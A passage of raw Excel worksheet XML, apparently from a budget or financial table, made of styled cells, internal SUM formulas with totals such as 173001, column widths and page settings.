      <c r="XCB38" s="392"/>
      <c r="XCC38" s="392"/>
      <c r="XCD38" s="392"/>
      <c r="XCE38" s="392"/>
      <c r="XCF38" s="392"/>
      <c r="XCG38" s="392"/>
      <c r="XCH38" s="392"/>
      <c r="XCI38" s="392"/>
      <c r="XCJ38" s="392"/>
      <c r="XCK38" s="392"/>
      <c r="XCL38" s="392"/>
      <c r="XCM38" s="392"/>
      <c r="XCN38" s="392"/>
      <c r="XCO38" s="392"/>
      <c r="XCP38" s="392"/>
      <c r="XCQ38" s="392"/>
      <c r="XCR38" s="392"/>
      <c r="XCS38" s="392"/>
      <c r="XCT38" s="392"/>
      <c r="XCU38" s="392"/>
      <c r="XCV38" s="392"/>
      <c r="XCW38" s="392"/>
      <c r="XCX38" s="392"/>
      <c r="XCY38" s="392"/>
      <c r="XCZ38" s="392"/>
      <c r="XDA38" s="392"/>
      <c r="XDB38" s="392"/>
      <c r="XDC38" s="392"/>
      <c r="XDD38" s="392"/>
      <c r="XDE38" s="392"/>
      <c r="XDF38" s="392"/>
      <c r="XDG38" s="392"/>
      <c r="XDH38" s="392"/>
      <c r="XDI38" s="392"/>
      <c r="XDJ38" s="392"/>
      <c r="XDK38" s="392"/>
      <c r="XDL38" s="392"/>
      <c r="XDM38" s="392"/>
      <c r="XDN38" s="392"/>
      <c r="XDO38" s="392"/>
      <c r="XDP38" s="392"/>
      <c r="XDQ38" s="392"/>
      <c r="XDR38" s="392"/>
      <c r="XDS38" s="392"/>
      <c r="XDT38" s="392"/>
      <c r="XDU38" s="392"/>
      <c r="XDV38" s="392"/>
      <c r="XDW38" s="392"/>
      <c r="XDX38" s="392"/>
      <c r="XDY38" s="392"/>
      <c r="XDZ38" s="392"/>
      <c r="XEA38" s="392"/>
      <c r="XEB38" s="392"/>
      <c r="XEC38" s="392"/>
      <c r="XED38" s="392"/>
      <c r="XEE38" s="392"/>
      <c r="XEF38" s="392"/>
      <c r="XEG38" s="392"/>
      <c r="XEH38" s="392"/>
      <c r="XEI38" s="392"/>
      <c r="XEJ38" s="392"/>
      <c r="XEK38" s="392"/>
      <c r="XEL38" s="392"/>
      <c r="XEM38" s="392"/>
      <c r="XEN38" s="392"/>
      <c r="XEO38" s="392"/>
      <c r="XEP38" s="392"/>
      <c r="XEQ38" s="392"/>
      <c r="XER38" s="392"/>
      <c r="XES38" s="392"/>
      <c r="XET38" s="392"/>
      <c r="XEU38" s="392"/>
      <c r="XEV38" s="392"/>
      <c r="XEW38" s="392"/>
      <c r="XEX38" s="392"/>
    </row>
    <row r="39" spans="1:16378" s="378" customFormat="1" ht="18.95" customHeight="1">
      <c r="A39" s="393" t="s">
        <v>932</v>
      </c>
      <c r="B39" s="391">
        <f>B40+B42+B43+B41</f>
        <v>24049</v>
      </c>
    </row>
    <row r="40" spans="1:16378" s="378" customFormat="1" ht="18.95" customHeight="1">
      <c r="A40" s="394" t="s">
        <v>933</v>
      </c>
      <c r="B40" s="391"/>
    </row>
    <row r="41" spans="1:16378" s="378" customFormat="1" ht="18.95" customHeight="1">
      <c r="A41" s="394" t="s">
        <v>934</v>
      </c>
      <c r="B41" s="391">
        <v>6354</v>
      </c>
    </row>
    <row r="42" spans="1:16378" s="378" customFormat="1" ht="18.95" customHeight="1">
      <c r="A42" s="393" t="s">
        <v>935</v>
      </c>
      <c r="B42" s="391">
        <v>806</v>
      </c>
    </row>
    <row r="43" spans="1:16378" s="378" customFormat="1" ht="18.95" customHeight="1">
      <c r="A43" s="393" t="s">
        <v>936</v>
      </c>
      <c r="B43" s="391">
        <v>16889</v>
      </c>
    </row>
    <row r="44" spans="1:16378" s="380" customFormat="1" ht="18.95" customHeight="1">
      <c r="A44" s="34" t="s">
        <v>937</v>
      </c>
      <c r="B44" s="398">
        <f>B8+B27+B38+B5</f>
        <v>173001</v>
      </c>
    </row>
    <row r="45" spans="1:16378" s="381" customFormat="1">
      <c r="B45" s="382"/>
    </row>
    <row r="46" spans="1:16378" s="381" customFormat="1">
      <c r="B46" s="382"/>
    </row>
    <row r="47" spans="1:16378" s="381" customFormat="1">
      <c r="B47" s="382"/>
    </row>
    <row r="48" spans="1:16378" s="381" customFormat="1">
      <c r="B48" s="382"/>
    </row>
    <row r="49" spans="2:2" s="381" customFormat="1">
      <c r="B49" s="382"/>
    </row>
    <row r="50" spans="2:2" s="381" customFormat="1">
      <c r="B50" s="382"/>
    </row>
    <row r="51" spans="2:2" s="381" customFormat="1">
      <c r="B51" s="382"/>
    </row>
    <row r="52" spans="2:2" s="381" customFormat="1">
      <c r="B52" s="382"/>
    </row>
    <row r="53" spans="2:2" s="381" customFormat="1">
      <c r="B53" s="382"/>
    </row>
    <row r="54" spans="2:2" s="381" customFormat="1">
      <c r="B54" s="382"/>
    </row>
    <row r="55" spans="2:2" s="381" customFormat="1">
      <c r="B55" s="382"/>
    </row>
    <row r="56" spans="2:2" s="381" customFormat="1">
      <c r="B56" s="382"/>
    </row>
    <row r="57" spans="2:2" s="381" customFormat="1">
      <c r="B57" s="382"/>
    </row>
    <row r="58" spans="2:2" s="381" customFormat="1">
      <c r="B58" s="382"/>
    </row>
    <row r="59" spans="2:2" s="381" customFormat="1">
      <c r="B59" s="382"/>
    </row>
    <row r="60" spans="2:2" s="381" customFormat="1">
      <c r="B60" s="382"/>
    </row>
    <row r="61" spans="2:2" s="381" customFormat="1">
      <c r="B61" s="382"/>
    </row>
    <row r="62" spans="2:2" s="381" customFormat="1">
      <c r="B62" s="382"/>
    </row>
    <row r="63" spans="2:2" s="381" customFormat="1">
      <c r="B63" s="382"/>
    </row>
    <row r="64" spans="2:2" s="381" customFormat="1">
      <c r="B64" s="382"/>
    </row>
    <row r="65" spans="2:2" s="381" customFormat="1">
      <c r="B65" s="382"/>
    </row>
    <row r="66" spans="2:2" s="381" customFormat="1">
      <c r="B66" s="382"/>
    </row>
    <row r="67" spans="2:2" s="381" customFormat="1">
      <c r="B67" s="382"/>
    </row>
    <row r="68" spans="2:2" s="381" customFormat="1">
      <c r="B68" s="382"/>
    </row>
    <row r="69" spans="2:2" s="381" customFormat="1">
      <c r="B69" s="382"/>
    </row>
    <row r="70" spans="2:2" s="381" customFormat="1">
      <c r="B70" s="382"/>
    </row>
    <row r="71" spans="2:2" s="381" customFormat="1">
      <c r="B71" s="382"/>
    </row>
    <row r="72" spans="2:2" s="381" customFormat="1">
      <c r="B72" s="382"/>
    </row>
    <row r="73" spans="2:2" s="381" customFormat="1">
      <c r="B73" s="382"/>
    </row>
    <row r="74" spans="2:2" s="381" customFormat="1">
      <c r="B74" s="382"/>
    </row>
    <row r="75" spans="2:2" s="381" customFormat="1">
      <c r="B75" s="382"/>
    </row>
    <row r="76" spans="2:2" s="381" customFormat="1">
      <c r="B76" s="382"/>
    </row>
    <row r="77" spans="2:2" s="381" customFormat="1">
      <c r="B77" s="382"/>
    </row>
    <row r="78" spans="2:2" s="381" customFormat="1">
      <c r="B78" s="382"/>
    </row>
    <row r="79" spans="2:2" s="381" customFormat="1">
      <c r="B79" s="382"/>
    </row>
    <row r="80" spans="2:2" s="381" customFormat="1">
      <c r="B80" s="382"/>
    </row>
    <row r="81" spans="2:2" s="381" customFormat="1">
      <c r="B81" s="382"/>
    </row>
    <row r="82" spans="2:2" s="381" customFormat="1">
      <c r="B82" s="382"/>
    </row>
    <row r="83" spans="2:2" s="381" customFormat="1">
      <c r="B83" s="382"/>
    </row>
    <row r="84" spans="2:2" s="381" customFormat="1">
      <c r="B84" s="382"/>
    </row>
    <row r="85" spans="2:2" s="381" customFormat="1">
      <c r="B85" s="382"/>
    </row>
    <row r="86" spans="2:2" s="381" customFormat="1">
      <c r="B86" s="382"/>
    </row>
    <row r="87" spans="2:2" s="381" customFormat="1">
      <c r="B87" s="382"/>
    </row>
    <row r="88" spans="2:2" s="381" customFormat="1">
      <c r="B88" s="382"/>
    </row>
    <row r="89" spans="2:2" s="381" customFormat="1">
      <c r="B89" s="382"/>
    </row>
    <row r="90" spans="2:2" s="381" customFormat="1">
      <c r="B90" s="382"/>
    </row>
    <row r="91" spans="2:2" s="381" customFormat="1">
      <c r="B91" s="382"/>
    </row>
    <row r="92" spans="2:2" s="381" customFormat="1">
      <c r="B92" s="382"/>
    </row>
    <row r="93" spans="2:2" s="381" customFormat="1">
      <c r="B93" s="382"/>
    </row>
    <row r="94" spans="2:2" s="381" customFormat="1">
      <c r="B94" s="382"/>
    </row>
    <row r="95" spans="2:2" s="381" customFormat="1">
      <c r="B95" s="382"/>
    </row>
    <row r="96" spans="2:2" s="381" customFormat="1">
      <c r="B96" s="382"/>
    </row>
    <row r="97" spans="2:2" s="381" customFormat="1">
      <c r="B97" s="382"/>
    </row>
    <row r="98" spans="2:2" s="381" customFormat="1">
      <c r="B98" s="382"/>
    </row>
    <row r="99" spans="2:2" s="381" customFormat="1">
      <c r="B99" s="382"/>
    </row>
    <row r="100" spans="2:2" s="381" customFormat="1">
      <c r="B100" s="382"/>
    </row>
    <row r="101" spans="2:2" s="381" customFormat="1">
      <c r="B101" s="382"/>
    </row>
    <row r="102" spans="2:2" s="381" customFormat="1">
      <c r="B102" s="382"/>
    </row>
    <row r="103" spans="2:2" s="381" customFormat="1">
      <c r="B103" s="382"/>
    </row>
    <row r="104" spans="2:2" s="381" customFormat="1">
      <c r="B104" s="382"/>
    </row>
    <row r="105" spans="2:2" s="381" customFormat="1">
      <c r="B105" s="382"/>
    </row>
    <row r="106" spans="2:2" s="381" customFormat="1">
      <c r="B106" s="382"/>
    </row>
    <row r="107" spans="2:2" s="381" customFormat="1">
      <c r="B107" s="382"/>
    </row>
    <row r="108" spans="2:2" s="381" customFormat="1">
      <c r="B108" s="382"/>
    </row>
    <row r="109" spans="2:2" s="381" customFormat="1">
      <c r="B109" s="382"/>
    </row>
    <row r="110" spans="2:2" s="381" customFormat="1">
      <c r="B110" s="382"/>
    </row>
    <row r="111" spans="2:2" s="381" customFormat="1">
      <c r="B111" s="382"/>
    </row>
    <row r="112" spans="2:2" s="381" customFormat="1">
      <c r="B112" s="382"/>
    </row>
    <row r="113" spans="2:2" s="381" customFormat="1">
      <c r="B113" s="382"/>
    </row>
    <row r="114" spans="2:2" s="381" customFormat="1">
      <c r="B114" s="382"/>
    </row>
    <row r="115" spans="2:2" s="381" customFormat="1">
      <c r="B115" s="382"/>
    </row>
    <row r="116" spans="2:2" s="381" customFormat="1">
      <c r="B116" s="382"/>
    </row>
    <row r="117" spans="2:2" s="381" customFormat="1">
      <c r="B117" s="382"/>
    </row>
    <row r="118" spans="2:2" s="381" customFormat="1">
      <c r="B118" s="382"/>
    </row>
    <row r="119" spans="2:2" s="381" customFormat="1">
      <c r="B119" s="382"/>
    </row>
    <row r="120" spans="2:2" s="381" customFormat="1">
      <c r="B120" s="382"/>
    </row>
    <row r="121" spans="2:2" s="381" customFormat="1">
      <c r="B121" s="382"/>
    </row>
    <row r="122" spans="2:2" s="381" customFormat="1">
      <c r="B122" s="382"/>
    </row>
    <row r="123" spans="2:2" s="381" customFormat="1">
      <c r="B123" s="382"/>
    </row>
    <row r="124" spans="2:2" s="381" customFormat="1">
      <c r="B124" s="382"/>
    </row>
    <row r="125" spans="2:2" s="381" customFormat="1">
      <c r="B125" s="382"/>
    </row>
    <row r="126" spans="2:2" s="381" customFormat="1">
      <c r="B126" s="382"/>
    </row>
    <row r="127" spans="2:2" s="381" customFormat="1">
      <c r="B127" s="382"/>
    </row>
    <row r="128" spans="2:2" s="381" customFormat="1">
      <c r="B128" s="382"/>
    </row>
    <row r="129" spans="2:2" s="381" customFormat="1">
      <c r="B129" s="382"/>
    </row>
    <row r="130" spans="2:2" s="381" customFormat="1">
      <c r="B130" s="382"/>
    </row>
    <row r="131" spans="2:2" s="381" customFormat="1">
      <c r="B131" s="382"/>
    </row>
    <row r="132" spans="2:2" s="381" customFormat="1">
      <c r="B132" s="382"/>
    </row>
    <row r="133" spans="2:2" s="381" customFormat="1">
      <c r="B133" s="382"/>
    </row>
    <row r="134" spans="2:2" s="381" customFormat="1">
      <c r="B134" s="382"/>
    </row>
    <row r="135" spans="2:2" s="381" customFormat="1">
      <c r="B135" s="382"/>
    </row>
    <row r="136" spans="2:2" s="381" customFormat="1">
      <c r="B136" s="382"/>
    </row>
    <row r="137" spans="2:2" s="381" customFormat="1">
      <c r="B137" s="382"/>
    </row>
    <row r="138" spans="2:2" s="381" customFormat="1">
      <c r="B138" s="382"/>
    </row>
    <row r="139" spans="2:2" s="381" customFormat="1">
      <c r="B139" s="382"/>
    </row>
    <row r="140" spans="2:2" s="381" customFormat="1">
      <c r="B140" s="382"/>
    </row>
    <row r="141" spans="2:2" s="381" customFormat="1">
      <c r="B141" s="382"/>
    </row>
    <row r="142" spans="2:2" s="381" customFormat="1">
      <c r="B142" s="382"/>
    </row>
    <row r="143" spans="2:2" s="381" customFormat="1">
      <c r="B143" s="382"/>
    </row>
    <row r="144" spans="2:2" s="381" customFormat="1">
      <c r="B144" s="382"/>
    </row>
    <row r="145" spans="2:2" s="381" customFormat="1">
      <c r="B145" s="382"/>
    </row>
    <row r="146" spans="2:2" s="381" customFormat="1">
      <c r="B146" s="382"/>
    </row>
    <row r="147" spans="2:2" s="381" customFormat="1">
      <c r="B147" s="382"/>
    </row>
    <row r="148" spans="2:2" s="381" customFormat="1">
      <c r="B148" s="382"/>
    </row>
    <row r="149" spans="2:2" s="381" customFormat="1">
      <c r="B149" s="382"/>
    </row>
    <row r="150" spans="2:2" s="381" customFormat="1">
      <c r="B150" s="382"/>
    </row>
    <row r="151" spans="2:2" s="381" customFormat="1">
      <c r="B151" s="382"/>
    </row>
    <row r="152" spans="2:2" s="381" customFormat="1">
      <c r="B152" s="382"/>
    </row>
    <row r="153" spans="2:2" s="381" customFormat="1">
      <c r="B153" s="382"/>
    </row>
    <row r="154" spans="2:2" s="381" customFormat="1">
      <c r="B154" s="382"/>
    </row>
    <row r="155" spans="2:2" s="381" customFormat="1">
      <c r="B155" s="382"/>
    </row>
    <row r="156" spans="2:2" s="381" customFormat="1">
      <c r="B156" s="382"/>
    </row>
    <row r="157" spans="2:2" s="381" customFormat="1">
      <c r="B157" s="382"/>
    </row>
    <row r="158" spans="2:2" s="381" customFormat="1">
      <c r="B158" s="382"/>
    </row>
    <row r="159" spans="2:2" s="381" customFormat="1">
      <c r="B159" s="382"/>
    </row>
    <row r="160" spans="2:2" s="381" customFormat="1">
      <c r="B160" s="382"/>
    </row>
    <row r="161" spans="2:2" s="381" customFormat="1">
      <c r="B161" s="382"/>
    </row>
    <row r="162" spans="2:2" s="381" customFormat="1">
      <c r="B162" s="382"/>
    </row>
    <row r="163" spans="2:2" s="381" customFormat="1">
      <c r="B163" s="382"/>
    </row>
    <row r="164" spans="2:2" s="381" customFormat="1">
      <c r="B164" s="382"/>
    </row>
    <row r="165" spans="2:2" s="381" customFormat="1">
      <c r="B165" s="382"/>
    </row>
    <row r="166" spans="2:2" s="381" customFormat="1">
      <c r="B166" s="382"/>
    </row>
    <row r="167" spans="2:2" s="381" customFormat="1">
      <c r="B167" s="382"/>
    </row>
    <row r="168" spans="2:2" s="381" customFormat="1">
      <c r="B168" s="382"/>
    </row>
    <row r="169" spans="2:2" s="381" customFormat="1">
      <c r="B169" s="382"/>
    </row>
    <row r="170" spans="2:2" s="381" customFormat="1">
      <c r="B170" s="382"/>
    </row>
    <row r="171" spans="2:2" s="381" customFormat="1">
      <c r="B171" s="382"/>
    </row>
    <row r="172" spans="2:2" s="381" customFormat="1">
      <c r="B172" s="382"/>
    </row>
    <row r="173" spans="2:2" s="381" customFormat="1">
      <c r="B173" s="382"/>
    </row>
    <row r="174" spans="2:2" s="381" customFormat="1">
      <c r="B174" s="382"/>
    </row>
    <row r="175" spans="2:2" s="381" customFormat="1">
      <c r="B175" s="382"/>
    </row>
    <row r="176" spans="2:2" s="381" customFormat="1">
      <c r="B176" s="382"/>
    </row>
    <row r="177" spans="2:2" s="381" customFormat="1">
      <c r="B177" s="382"/>
    </row>
    <row r="178" spans="2:2" s="381" customFormat="1">
      <c r="B178" s="382"/>
    </row>
    <row r="179" spans="2:2" s="381" customFormat="1">
      <c r="B179" s="382"/>
    </row>
    <row r="180" spans="2:2" s="381" customFormat="1">
      <c r="B180" s="382"/>
    </row>
    <row r="181" spans="2:2" s="381" customFormat="1">
      <c r="B181" s="382"/>
    </row>
    <row r="182" spans="2:2" s="381" customFormat="1">
      <c r="B182" s="382"/>
    </row>
    <row r="183" spans="2:2" s="381" customFormat="1">
      <c r="B183" s="382"/>
    </row>
    <row r="184" spans="2:2" s="381" customFormat="1">
      <c r="B184" s="382"/>
    </row>
    <row r="185" spans="2:2" s="381" customFormat="1">
      <c r="B185" s="382"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:B2"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" scale="9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00"/>
  <sheetViews>
    <sheetView showZeros="0" topLeftCell="A19" zoomScale="98" zoomScaleNormal="98" workbookViewId="0">
      <selection activeCell="H18" sqref="H18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="57.85546875" style="363" customWidth="1"/>
    <col min="2" max="2" width="33.28515625" style="364" customWidth="1"/>
    <col min="3" max="243" width="9.140625" style="356"/>
    <col min="244" max="253" width="8.85546875" style="356"/>
    <col min="254" max="16384" width="8.85546875" style="46"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" s="356" customFormat="1" ht="27" customHeight="1">
      <c r="A1" s="346" t="s">
        <v>938</v>
      </c>
      <c r="B1" s="346"/>
    </row>
    <row r="2" spans="1:2" s="356" customFormat="1" ht="30" customHeight="1">
      <c r="A2" s="673" t="s">
        <v>939</v>
      </c>
      <c r="B2" s="673"/>
    </row>
    <row r="3" spans="1:2" s="357" customFormat="1" ht="21.95" customHeight="1">
      <c r="A3" s="674" t="s">
        <v>456</v>
      </c>
      <c r="B3" s="674"/>
    </row>
    <row r="4" spans="1:2" s="358" customFormat="1" ht="27.95" customHeight="1">
      <c r="A4" s="365" t="s">
        <v>457</v>
      </c>
      <c r="B4" s="365" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="5" spans="1:2" s="359" customFormat="1" ht="21.95" customHeight="1">
      <c r="A5" s="366" t="s">
        <v>383</v>
      </c>
      <c r="B5" s="366">
        <f>SUM(B6:B33)/2</f>
        <v>173001</v>
      </c>
    </row>
    <row r="6" spans="1:2" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A6" s="367" t="s">
        <v>940</v>
      </c>
      <c r="B6" s="368">
        <f>SUM(B7:B11)</f>
        <v>23078</v>
      </c>
    </row>
    <row r="7" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A7" s="369" t="s">
        <v>466</v>
      </c>
      <c r="B7" s="80">
        <v>256</v>
      </c>
    </row>
    <row r="8" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A8" s="369" t="s">
        <v>468</v>
      </c>
      <c r="B8" s="80"/>
    </row>
    <row r="9" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A9" s="369" t="s">
        <v>469</v>
      </c>
      <c r="B9" s="80"/>
    </row>
    <row r="10" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A10" s="369" t="s">
        <v>470</v>
      </c>
      <c r="B10" s="80">
        <v>8752</v>
      </c>
    </row>
    <row r="11" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A11" s="369" t="s">
        <v>475</v>
      </c>
      <c r="B11" s="80">
        <v>14070</v>
      </c>
    </row>
    <row r="12" spans="1:2" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A12" s="367" t="s">
        <v>941</v>
      </c>
      <c r="B12" s="368">
        <f>SUM(B13:B18)</f>
        <v>121540</v>
      </c>
    </row>
    <row r="13" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A13" s="370" t="s">
        <v>942</v>
      </c>
      <c r="B13" s="80"/>
    </row>
    <row r="14" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A14" s="370" t="s">
        <v>478</v>
      </c>
      <c r="B14" s="80">
        <v>45048</v>
      </c>
    </row>
    <row r="15" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A15" s="370" t="s">
        <v>943</v>
      </c>
      <c r="B15" s="80">
        <v>11000</v>
      </c>
    </row>
    <row r="16" spans="1:2" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A16" s="370" t="s">
        <v>479</v>
      </c>
      <c r="B16" s="80">
        <v>2531</v>
      </c>
    </row>
    <row r="17" spans="1:253" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A17" s="370" t="s">
        <v>944</v>
      </c>
      <c r="B17" s="80">
        <v>1000</v>
      </c>
    </row>
    <row r="18" spans="1:253" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A18" s="370" t="s">
        <v>480</v>
      </c>
      <c r="B18" s="80">
        <v>61961</v>
      </c>
    </row>
    <row r="19" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A19" s="367" t="s">
        <v>945</v>
      </c>
      <c r="B19" s="368">
        <f>SUM(B20:B21)</f>
        <v>200</v>
      </c>
    </row>
    <row r="20" spans="1:253" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A20" s="369" t="s">
        <v>482</v>
      </c>
      <c r="B20" s="80"/>
    </row>
    <row r="21" spans="1:253" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A21" s="369" t="s">
        <v>483</v>
      </c>
      <c r="B21" s="80">
        <v>200</v>
      </c>
    </row>
    <row r="22" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A22" s="367" t="s">
        <v>946</v>
      </c>
      <c r="B22" s="368">
        <f>B23</f>
        <v>1203</v>
      </c>
    </row>
    <row r="23" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A23" s="369" t="s">
        <v>486</v>
      </c>
      <c r="B23" s="80">
        <v>1203</v>
      </c>
    </row>
    <row r="24" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A24" s="367" t="s">
        <v>947</v>
      </c>
      <c r="B24" s="368">
        <f>SUM(B25:B26)</f>
        <v>0</v>
      </c>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c r="IG24" s="371"/>
      <c r="IH24" s="371"/>
      <c r="II24" s="371"/>
      <c r="IJ24" s="371"/>
      <c r="IK24" s="371"/>
      <c r="IL24" s="371"/>
      <c r="IM24" s="371"/>
      <c r="IN24" s="371"/>
      <c r="IO24" s="371"/>
      <c r="IP24" s="371"/>
      <c r="IQ24" s="371"/>
      <c r="IR24" s="371"/>
      <c r="IS24" s="371"/>
    </row>
    <row r="25" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A25" s="369" t="s">
        <v>948</v>
      </c>
      <c r="B25" s="80"/>
    </row>
    <row r="26" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A26" s="369" t="s">
        <v>489</v>
      </c>
      <c r="B26" s="80"/>
    </row>
    <row r="27" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A27" s="372" t="s">
        <v>949</v>
      </c>
      <c r="B27" s="368">
        <f>B28</f>
        <v>0</v>
      </c>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c r="CS27" s="371"/>
      <c r="CT27" s="371"/>
      <c r="CU27" s="371"/>
      <c r="CV27" s="371"/>
      <c r="CW27" s="371"/>
      <c r="CX27" s="371"/>
      <c r="CY27" s="371"/>
      <c r="CZ27" s="371"/>
      <c r="DA27" s="371"/>
      <c r="DB27" s="371"/>
      <c r="DC27" s="371"/>
      <c r="DD27" s="371"/>
      <c r="DE27" s="371"/>
      <c r="DF27" s="371"/>
      <c r="DG27" s="371"/>
      <c r="DH27" s="371"/>
      <c r="DI27" s="371"/>
      <c r="DJ27" s="371"/>
      <c r="DK27" s="371"/>
      <c r="DL27" s="371"/>
      <c r="DM27" s="371"/>
      <c r="DN27" s="371"/>
      <c r="DO27" s="371"/>
      <c r="DP27" s="371"/>
      <c r="DQ27" s="371"/>
      <c r="DR27" s="371"/>
      <c r="DS27" s="371"/>
      <c r="DT27" s="371"/>
      <c r="DU27" s="371"/>
      <c r="DV27" s="371"/>
      <c r="DW27" s="371"/>
      <c r="DX27" s="371"/>
      <c r="DY27" s="371"/>
      <c r="DZ27" s="371"/>
      <c r="EA27" s="371"/>
      <c r="EB27" s="371"/>
      <c r="EC27" s="371"/>
      <c r="ED27" s="371"/>
      <c r="EE27" s="371"/>
      <c r="EF27" s="371"/>
      <c r="EG27" s="371"/>
      <c r="EH27" s="371"/>
      <c r="EI27" s="371"/>
      <c r="EJ27" s="371"/>
      <c r="EK27" s="371"/>
      <c r="EL27" s="371"/>
      <c r="EM27" s="371"/>
      <c r="EN27" s="371"/>
      <c r="EO27" s="371"/>
      <c r="EP27" s="371"/>
      <c r="EQ27" s="371"/>
      <c r="ER27" s="371"/>
      <c r="ES27" s="371"/>
      <c r="ET27" s="371"/>
      <c r="EU27" s="371"/>
      <c r="EV27" s="371"/>
      <c r="EW27" s="371"/>
      <c r="EX27" s="371"/>
      <c r="EY27" s="371"/>
      <c r="EZ27" s="371"/>
      <c r="FA27" s="371"/>
      <c r="FB27" s="371"/>
      <c r="FC27" s="371"/>
      <c r="FD27" s="371"/>
      <c r="FE27" s="371"/>
      <c r="FF27" s="371"/>
      <c r="FG27" s="371"/>
      <c r="FH27" s="371"/>
      <c r="FI27" s="371"/>
      <c r="FJ27" s="371"/>
      <c r="FK27" s="371"/>
      <c r="FL27" s="371"/>
      <c r="FM27" s="371"/>
      <c r="FN27" s="371"/>
      <c r="FO27" s="371"/>
      <c r="FP27" s="371"/>
      <c r="FQ27" s="371"/>
      <c r="FR27" s="371"/>
      <c r="FS27" s="371"/>
      <c r="FT27" s="371"/>
      <c r="FU27" s="371"/>
      <c r="FV27" s="371"/>
      <c r="FW27" s="371"/>
      <c r="FX27" s="371"/>
      <c r="FY27" s="371"/>
      <c r="FZ27" s="371"/>
      <c r="GA27" s="371"/>
      <c r="GB27" s="371"/>
      <c r="GC27" s="371"/>
      <c r="GD27" s="371"/>
      <c r="GE27" s="371"/>
      <c r="GF27" s="371"/>
      <c r="GG27" s="371"/>
      <c r="GH27" s="371"/>
      <c r="GI27" s="371"/>
      <c r="GJ27" s="371"/>
      <c r="GK27" s="371"/>
      <c r="GL27" s="371"/>
      <c r="GM27" s="371"/>
      <c r="GN27" s="371"/>
      <c r="GO27" s="371"/>
      <c r="GP27" s="371"/>
      <c r="GQ27" s="371"/>
      <c r="GR27" s="371"/>
      <c r="GS27" s="371"/>
      <c r="GT27" s="371"/>
      <c r="GU27" s="371"/>
      <c r="GV27" s="371"/>
      <c r="GW27" s="371"/>
      <c r="GX27" s="371"/>
      <c r="GY27" s="371"/>
      <c r="GZ27" s="371"/>
      <c r="HA27" s="371"/>
      <c r="HB27" s="371"/>
      <c r="HC27" s="371"/>
      <c r="HD27" s="371"/>
      <c r="HE27" s="371"/>
      <c r="HF27" s="371"/>
      <c r="HG27" s="371"/>
      <c r="HH27" s="371"/>
      <c r="HI27" s="371"/>
      <c r="HJ27" s="371"/>
      <c r="HK27" s="371"/>
      <c r="HL27" s="371"/>
      <c r="HM27" s="371"/>
      <c r="HN27" s="371"/>
      <c r="HO27" s="371"/>
      <c r="HP27" s="371"/>
      <c r="HQ27" s="371"/>
      <c r="HR27" s="371"/>
      <c r="HS27" s="371"/>
      <c r="HT27" s="371"/>
      <c r="HU27" s="371"/>
      <c r="HV27" s="371"/>
      <c r="HW27" s="371"/>
      <c r="HX27" s="371"/>
      <c r="HY27" s="371"/>
      <c r="HZ27" s="371"/>
      <c r="IA27" s="371"/>
      <c r="IB27" s="371"/>
      <c r="IC27" s="371"/>
      <c r="ID27" s="371"/>
      <c r="IE27" s="371"/>
      <c r="IF27" s="371"/>
      <c r="IG27" s="371"/>
      <c r="IH27" s="371"/>
      <c r="II27" s="371"/>
      <c r="IJ27" s="371"/>
      <c r="IK27" s="371"/>
      <c r="IL27" s="371"/>
      <c r="IM27" s="371"/>
      <c r="IN27" s="371"/>
      <c r="IO27" s="371"/>
      <c r="IP27" s="371"/>
      <c r="IQ27" s="371"/>
      <c r="IR27" s="371"/>
      <c r="IS27" s="371"/>
    </row>
    <row r="28" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A28" s="370" t="s">
        <v>950</v>
      </c>
      <c r="B28" s="80"/>
    </row>
    <row r="29" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A29" s="367" t="s">
        <v>490</v>
      </c>
      <c r="B29" s="368">
        <f>SUM(B30:B31)</f>
        <v>2931</v>
      </c>
    </row>
    <row r="30" spans="1:253" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A30" s="369" t="s">
        <v>491</v>
      </c>
      <c r="B30" s="80"/>
    </row>
    <row r="31" spans="1:253" s="361" customFormat="1" ht="21.95" customHeight="1">
      <c r="A31" s="369" t="s">
        <v>495</v>
      </c>
      <c r="B31" s="80">
        <v>2931</v>
      </c>
    </row>
    <row r="32" spans="1:253" s="360" customFormat="1" ht="21.95" customHeight="1">
      <c r="A32" s="367" t="s">
        <v>951</v>
      </c>
      <c r="B32" s="368">
        <f>SUM(B33:B34)</f>
        <v>24049</v>
      </c>
    </row>
